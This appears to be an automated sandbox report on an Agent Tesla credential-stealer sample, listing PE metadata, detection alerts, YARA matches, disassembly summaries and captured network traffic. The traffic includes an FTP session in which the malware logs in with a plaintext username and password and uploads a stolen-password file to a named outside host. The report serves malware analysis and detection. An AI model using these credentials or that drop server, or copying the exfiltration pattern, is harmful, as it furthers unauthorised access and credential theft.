.reloc | 0xba000 | 0xc | 0x200 | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xb8100 | 0xa79 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0xb8b8c | 0x14 | data | |
RT_VERSION | 0xb8bb0 | 0x360 | data | |
RT_MANIFEST | 0xb8f20 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/20/23-18:32:35.384138 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49700 | 54926 | 192.168.2.5 | 190.107.177.239
03/20/23-18:32:35.159386 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 18:32:25.445375919 CET | 49698 | 443 | 192.168.2.5 | 173.231.16.76
Mar 20, 2023 18:32:25.445451021 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.5
Mar 20, 2023 18:32:25.445578098 CET | 49698 | 443 | 192.168.2.5 | 173.231.16.76
Mar 20, 2023 18:32:25.496216059 CET | 49698 | 443 | 192.168.2.5 | 173.231.16.76
Mar 20, 2023 18:32:25.496239901 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.5
Mar 20, 2023 18:32:26.153322935 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.5
Mar 20, 2023 18:32:26.153417110 CET | 49698 | 443 | 192.168.2.5 | 173.231.16.76
Mar 20, 2023 18:32:26.161086082 CET | 49698 | 443 | 192.168.2.5 | 173.231.16.76
Mar 20, 2023 18:32:26.161137104 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.5
Mar 20, 2023 18:32:26.161732912 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.5
Mar 20, 2023 18:32:26.366749048 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.5
Mar 20, 2023 18:32:26.366868019 CET | 49698 | 443 | 192.168.2.5 | 173.231.16.76
Mar 20, 2023 18:32:26.482625961 CET | 49698 | 443 | 192.168.2.5 | 173.231.16.76
Mar 20, 2023 18:32:26.482650042 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.5
Mar 20, 2023 18:32:26.639955044 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.5
Mar 20, 2023 18:32:26.640053988 CET | 443 | 49698 | 173.231.16.76 | 192.168.2.5
Mar 20, 2023 18:32:26.640136957 CET | 49698 | 443 | 192.168.2.5 | 173.231.16.76
Mar 20, 2023 18:32:26.641061068 CET | 49698 | 443 | 192.168.2.5 | 173.231.16.76
Mar 20, 2023 18:32:33.120982885 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:33.345351934 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:33.345468044 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:33.570523024 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:33.570781946 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:33.794442892 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:33.794506073 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:33.797815084 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:34.036129951 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:34.036413908 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:34.259531975 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:34.259732962 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:34.483745098 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:34.483958006 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:34.707490921 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:34.707700014 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:34.930713892 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:34.932552099 CET | 49700 | 54926 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:35.060767889 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:35.158899069 CET | 54926 | 49700 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:35.159116030 CET | 49700 | 54926 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:35.159385920 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:35.383680105 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:35.384138107 CET | 49700 | 54926 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:35.384181976 CET | 49700 | 54926 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:35.560923100 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:35.609081030 CET | 54926 | 49700 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:35.609458923 CET | 54926 | 49700 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:35.609611034 CET | 49700 | 54926 | 192.168.2.5 | 190.107.177.239
Mar 20, 2023 18:32:35.610061884 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5
Mar 20, 2023 18:32:35.670270920 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 18:32:25.379782915 CET | 50295 | 53 | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 18:32:25.400003910 CET | 53 | 50295 | 8.8.8.8 | 192.168.2.5
Mar 20, 2023 18:32:25.412838936 CET | 60841 | 53 | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 18:32:25.435102940 CET | 53 | 60841 | 8.8.8.8 | 192.168.2.5
Mar 20, 2023 18:32:32.898178101 CET | 61893 | 53 | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 18:32:33.119693041 CET | 53 | 61893 | 8.8.8.8 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 18:32:25.379782915 CET | 192.168.2.5 | 8.8.8.8 | 0xc630 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:25.412838936 CET | 192.168.2.5 | 8.8.8.8 | 0x4bf1 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:32.898178101 CET | 192.168.2.5 | 8.8.8.8 | 0x4e5 | Standard query (0) | ftp.valvulasthermovalve.cl | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 18:32:25.400003910 CET | 8.8.8.8 | 192.168.2.5 | 0xc630 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:32:25.400003910 CET | 8.8.8.8 | 192.168.2.5 | 0xc630 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:25.400003910 CET | 8.8.8.8 | 192.168.2.5 | 0xc630 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:25.400003910 CET | 8.8.8.8 | 192.168.2.5 | 0xc630 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:25.435102940 CET | 8.8.8.8 | 192.168.2.5 | 0x4bf1 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 18:32:25.435102940 CET | 8.8.8.8 | 192.168.2.5 | 0x4bf1 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:25.435102940 CET | 8.8.8.8 | 192.168.2.5 | 0x4bf1 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:25.435102940 CET | 8.8.8.8 | 192.168.2.5 | 0x4bf1 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 18:32:33.119693041 CET | 8.8.8.8 | 192.168.2.5 | 0x4e5 | No error (0) | ftp.valvulasthermovalve.cl | | 190.107.177.239 | A (IP address) | IN (0x0001) | false
                                                                                • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49698 | 173.231.16.76 | 443 | C:\Users\user\Desktop\Q4YODvoYjL.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 17:32:26 UTC | 0 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2023-03-20 17:32:26 UTC | 0 | IN | HTTP/1.1 200 OK
Content-Length: 14
Content-Type: text/plain
Date: Mon, 20 Mar 2023 17:32:26 GMT
Vary: Origin
Connection: close
2023-03-20 17:32:26 UTC | 0 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38
Data Ascii: 102.129.143.78


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Mar 20, 2023 18:32:33.570523024 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 3 of 100 allowed.
220-Local time is now 14:32. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Mar 20, 2023 18:32:33.570781946 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239 | USER cva19491@valvulasthermovalve.cl
Mar 20, 2023 18:32:33.794506073 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5 | 331 User cva19491@valvulasthermovalve.cl OK. Password required
Mar 20, 2023 18:32:33.797815084 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239 | PASS LILKOOLL14!!
Mar 20, 2023 18:32:34.036129951 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5 | 230 OK. Current restricted directory is /
Mar 20, 2023 18:32:34.259531975 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5 | 200 OK, UTF-8 enabled
Mar 20, 2023 18:32:34.259732962 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239 | PWD
Mar 20, 2023 18:32:34.483745098 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5 | 257 "/" is your current location
Mar 20, 2023 18:32:34.483958006 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239 | TYPE I
Mar 20, 2023 18:32:34.707490921 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5 | 200 TYPE is now 8-bit binary
Mar 20, 2023 18:32:34.707700014 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239 | PASV
Mar 20, 2023 18:32:34.930713892 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5 | 227 Entering Passive Mode (190,107,177,239,214,142)
Mar 20, 2023 18:32:35.159385920 CET | 49699 | 21 | 192.168.2.5 | 190.107.177.239 | STOR PW_user-632922_2023_03_20_18_32_31.html
Mar 20, 2023 18:32:35.383680105 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5 | 150 Accepted data connection
Mar 20, 2023 18:32:35.610061884 CET | 21 | 49699 | 190.107.177.239 | 192.168.2.5 | 226-File successfully transferred
226 0.225 seconds (measured here), 1.52 Kbytes per second


Target ID: 0
Start time: 18:32:02
Start date: 20/03/2023
Path: C:\Users\user\Desktop\Q4YODvoYjL.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Q4YODvoYjL.exe
Imagebase: 0x820000
File size: 743936 bytes
MD5 hash: E30C67B19383F259D7414B763049EB2F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

Target ID: 1
Start time: 18:32:23
Start date: 20/03/2023
Path: C:\Users\user\Desktop\Q4YODvoYjL.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Q4YODvoYjL.exe
Imagebase: 0x5a0000
File size: 743936 bytes
MD5 hash: E30C67B19383F259D7414B763049EB2F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low


                                                                                  Execution Graph

                                                                                  Execution Coverage:13.2%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:172
                                                                                  Total number of Limit Nodes:3

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 622 11ea028-11ea030 623 11ea03b-11ea03d 622->623 624 11ea036 call 11e9370 622->624 625 11ea03f 623->625 626 11ea053-11ea057 623->626 624->623 676 11ea045 call 11ea2b0 625->676 677 11ea045 call 11ea2a0 625->677 627 11ea06b-11ea0ac 626->627 628 11ea059-11ea063 626->628 633 11ea0ae-11ea0b6 627->633 634 11ea0b9-11ea0c7 627->634 628->627 629 11ea04b-11ea04d 629->626 630 11ea188-11ea248 629->630 671 11ea24a-11ea24d 630->671 672 11ea250-11ea27b GetModuleHandleW 630->672 633->634 636 11ea0eb-11ea0ed 634->636 637 11ea0c9-11ea0ce 634->637 638 11ea0f0-11ea0f7 636->638 639 11ea0d9 637->639 640 11ea0d0-11ea0d7 call 11e937c 637->640 643 11ea0f9-11ea101 638->643 644 11ea104-11ea10b 638->644 645 11ea0db-11ea0e9 639->645 640->645 643->644 647 11ea10d-11ea115 644->647 648 11ea118-11ea121 call 11e938c 644->648 645->638 647->648 653 11ea12e-11ea133 648->653 654 11ea123-11ea12b 648->654 655 11ea135-11ea13c 653->655 656 11ea151-11ea155 653->656 654->653 655->656 658 11ea13e-11ea14e call 11e939c call 11e93ac 655->658 678 11ea158 call 11ea5a8 656->678 679 11ea158 call 11ea599 656->679 658->656 659 11ea15b-11ea15e 661 11ea160-11ea17e 659->661 662 11ea181-11ea187 659->662 661->662 671->672 673 11ea27d-11ea283 672->673 674 11ea284-11ea298 672->674 673->674 676->629 677->629 678->659 679->659
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 011EA26E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 7d07db7e2413bce49379f08a2964740afcd5e9faf59c015f010730a179d479da
                                                                                  • Instruction ID: fa495061b3a801cb54886adad3c78e35e3c8734fdfd22400174bfefdab9ea56c
                                                                                  • Opcode Fuzzy Hash: 7d07db7e2413bce49379f08a2964740afcd5e9faf59c015f010730a179d479da
                                                                                  • Instruction Fuzzy Hash: C2712570A00B058FDB28DFA9D44475ABBF1BF88344F00892EE48AD7A50DB35E845CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 680 11e5364-11e5431 CreateActCtxA 682 11e543a-11e5494 680->682 683 11e5433-11e5439 680->683 690 11e5496-11e5499 682->690 691 11e54a3-11e54a7 682->691 683->682 690->691 692 11e54b8 691->692 693 11e54a9-11e54b5 691->693 695 11e54b9 692->695 693->692 695->695
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 011E5421
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: a3e1bb2063a8098593ea211096ce7897b1047b12af867eeb7792688ddd632460
                                                                                  • Instruction ID: 54cf64c34b92ed92f62f459382d038675e030da32c47bf8d477cce845596dbaf
                                                                                  • Opcode Fuzzy Hash: a3e1bb2063a8098593ea211096ce7897b1047b12af867eeb7792688ddd632460
                                                                                  • Instruction Fuzzy Hash: 074104B1D0061DCEDB24DFA9C9887DEBBF1BF48304F20806AD409AB251E7B55946CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 696 11e3de8-11e5431 CreateActCtxA 699 11e543a-11e5494 696->699 700 11e5433-11e5439 696->700 707 11e5496-11e5499 699->707 708 11e54a3-11e54a7 699->708 700->699 707->708 709 11e54b8 708->709 710 11e54a9-11e54b5 708->710 712 11e54b9 709->712 710->709 712->712
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 011E5421
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 028751832d87eb5ab9b8ea6c0ac59c6cced051bbe64734e492f29b52155349e1
                                                                                  • Instruction ID: b845a0113790e5c886cba5ff5854407671753fc2233618c4d63d14acd35bc606
                                                                                  • Opcode Fuzzy Hash: 028751832d87eb5ab9b8ea6c0ac59c6cced051bbe64734e492f29b52155349e1
                                                                                  • Instruction Fuzzy Hash: E241F170D0061DCFDB24DFA9C88879EBBF6BF48304F20806AD409AB251D7B56945CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 713 5152f90-5152fcc 714 5152fd2-5152fd7 713->714 715 515307c-515309c 713->715 716 5152fd9-5153010 714->716 717 515302a-5153062 CallWindowProcW 714->717 721 515309f-51530ac 715->721 723 5153012-5153018 716->723 724 5153019-5153028 716->724 719 5153064-515306a 717->719 720 515306b-515307a 717->720 719->720 720->721 723->724 724->721
                                                                                  APIs
                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05153051
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.352327181.0000000005150000.00000040.00000800.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5150000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallProcWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2714655100-0
                                                                                  • Opcode ID: 6d22768c682d0f83613b4c9d96a2ce4196bce72855c4dc23d0779bb36566d8ca
                                                                                  • Instruction ID: 45cc189c330f85f7fce6fe173565d309a0707330a89a87d241a3ed68940bab35
                                                                                  • Opcode Fuzzy Hash: 6d22768c682d0f83613b4c9d96a2ce4196bce72855c4dc23d0779bb36566d8ca
                                                                                  • Instruction Fuzzy Hash: D9410AB5900305DFCB14CF99C488AAEBBF5FF88324F258859D429AB361D775A841CFA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 727 11ea9e4-11ec9d4 DuplicateHandle 729 11ec9dd-11ec9fa 727->729 730 11ec9d6-11ec9dc 727->730 730->729
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011EC906,?,?,?,?,?), ref: 011EC9C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 720cddd1ba66a500eb306b60b40704e15038acb219a4ed36ac559e353afd63aa
                                                                                  • Instruction ID: aab411708116d14373beaa693cf96185e0290bd83033dfa8b62cf6e7f8f933d4
                                                                                  • Opcode Fuzzy Hash: 720cddd1ba66a500eb306b60b40704e15038acb219a4ed36ac559e353afd63aa
                                                                                  • Instruction Fuzzy Hash: 5121E3B5900609AFDB10CF9AD984ADEFFF4EB48320F14841AE914B7310D374A944DFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 733 11ec938-11ec9d4 DuplicateHandle 734 11ec9dd-11ec9fa 733->734 735 11ec9d6-11ec9dc 733->735 735->734
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011EC906,?,?,?,?,?), ref: 011EC9C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: ae0d8f864548ddeefe10d7600d75f8a5bacdd0798ebde238c734c604af754e25
                                                                                  • Instruction ID: 7d41472ffdf5a40d2c6bf5a7cd05137df96069d8bd1314b1a103bfbffc695ca8
                                                                                  • Opcode Fuzzy Hash: ae0d8f864548ddeefe10d7600d75f8a5bacdd0798ebde238c734c604af754e25
                                                                                  • Instruction Fuzzy Hash: 9621E3B6D002499FDB10CFA9D984ADEBFF4FB48320F14841AE954B7210D374AA44DFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 738 11e93d8-11ea4d0 740 11ea4d8-11ea507 LoadLibraryExW 738->740 741 11ea4d2-11ea4d5 738->741 742 11ea509-11ea50f 740->742 743 11ea510-11ea52d 740->743 741->740 742->743
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011EA2E9,00000800,00000000,00000000), ref: 011EA4FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 3ba7bc3917142b157626f80d79adf1180212129fd307139d2d883691dcccaf06
                                                                                  • Instruction ID: 833b43d4867bb0f72730a63384a270a8e916182997c48eda2f019e8ca3806f3c
                                                                                  • Opcode Fuzzy Hash: 3ba7bc3917142b157626f80d79adf1180212129fd307139d2d883691dcccaf06
                                                                                  • Instruction Fuzzy Hash: 421103B69007099FDB14CF9AD448AEEFBF4EF88310F14842AE819B7600C375A945CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 746 11ea488-11ea4d0 747 11ea4d8-11ea507 LoadLibraryExW 746->747 748 11ea4d2-11ea4d5 746->748 749 11ea509-11ea50f 747->749 750 11ea510-11ea52d 747->750 748->747 749->750
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011EA2E9,00000800,00000000,00000000), ref: 011EA4FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 5fe2ea71a5a09369f0aaff9fca3c768d09007f0083c0d65e8ea0383d21c04234
                                                                                  • Instruction ID: 266ac68a44d82081b85d9fcd08e25abc759bc1295176b77d7e9ac8e6f1e05b45
                                                                                  • Opcode Fuzzy Hash: 5fe2ea71a5a09369f0aaff9fca3c768d09007f0083c0d65e8ea0383d21c04234
                                                                                  • Instruction Fuzzy Hash: BF11E4B6D006498FDB14CFAAD548ADEFBF4AF48310F14842ED415B7600C375A545DFA4
                                                                                   Uniqueness Score: -1.00%

                                                                                   Control-flow Graph

                                                                                   [control-flow graph rendering omitted: basic blocks 11ea208-11ea298; calls GetModuleHandleW]
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 011EA26E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: d82a1884cd0c7620aafa7b6077ecb318e3faa87c62e0dbcbaceeff2b4052b52f
                                                                                  • Instruction ID: 3262f1bb938e3a0a3357abb5dc473642672f0e656edc2a10eb80cbc77dc79072
                                                                                  • Opcode Fuzzy Hash: d82a1884cd0c7620aafa7b6077ecb318e3faa87c62e0dbcbaceeff2b4052b52f
                                                                                  • Instruction Fuzzy Hash: 4A1110B2C0060A8FDB14CF9AD448ADEFBF4EF88324F10842AD429B7600C379A545CFA1
                                                                                   Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5dff513039aae0767e2173b6c8a6815826feaa0d40e8ff1653cc9d0c2b908eeb
                                                                                  • Instruction ID: 4d4051124ea7bfdcea3d9f7053c6d55fe6f9c1ff7dca8207639b6f85b18dbf66
                                                                                  • Opcode Fuzzy Hash: 5dff513039aae0767e2173b6c8a6815826feaa0d40e8ff1653cc9d0c2b908eeb
                                                                                  • Instruction Fuzzy Hash: B912C4F5C91746CADB30CF65E9982893BA1B7403ACBD06A08D2711FAD1D7B811AECF54
                                                                                   Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.343543105.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_11e0000_Q4YODvoYjL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 104ba8b57860f773d8330e9cebc6845c2708bdbba813f8e49221f8a9ddc5ad8b
                                                                                  • Instruction ID: 817ae5bebb1d70f6f5d4808353bca6e5d2022d79bb84ffc91a4fe50d1a585938
                                                                                  • Opcode Fuzzy Hash: 104ba8b57860f773d8330e9cebc6845c2708bdbba813f8e49221f8a9ddc5ad8b
                                                                                  • Instruction Fuzzy Hash: BEA1A232E0061ACFCF09DFA5C8489DDBBF2FF84304B15856AE905AB261EB31A955CF40
                                                                                   Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
